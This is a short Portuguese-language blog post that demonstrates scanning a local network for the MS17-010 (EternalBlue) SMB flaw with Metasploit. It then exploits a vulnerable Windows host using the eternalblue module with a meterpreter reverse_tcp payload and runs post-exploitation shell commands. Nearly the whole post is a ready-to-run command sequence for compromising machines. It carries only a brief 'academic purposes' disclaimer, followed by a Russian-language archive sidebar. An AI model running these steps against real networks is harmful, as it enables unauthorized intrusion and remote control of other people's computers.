Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.
A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/
Comandos dentro do Kali Linux
# service postgresql start
# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
Pos invasão
sysinfo
getuid
shell
E por ai vai...
Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!
Junior
Сообщения блога
- 2022 (4)
- 2021 (2)
- 2020 (7)
- 2019 (31)
- ноября (1)
- октября (2)
- сентября (3)
- августа (4)
- июля (5)
- июня (3)
- апреля (3)
- марта (4)
- февраля (4)
- января (2)
- 2018 (21)
- декабря (3)
- ноября (4)
- октября (2)
- сентября (3)
- июля (3)
- июня (1)
- мая (1)
- апреля (1)
- марта (1)
- февраля (2)
- 2017 (29)
- декабря (1)
- ноября (4)
- октября (2)
- сентября (2)
- августа (1)
- июля (6)
- июня (3)
- мая (1)
- апреля (1)
- марта (5)
- февраля (1)
- января (2)
- 2016 (17)
- 2015 (7)
- 2014 (7)
- 2013 (24)
Друг
0 communities
Нет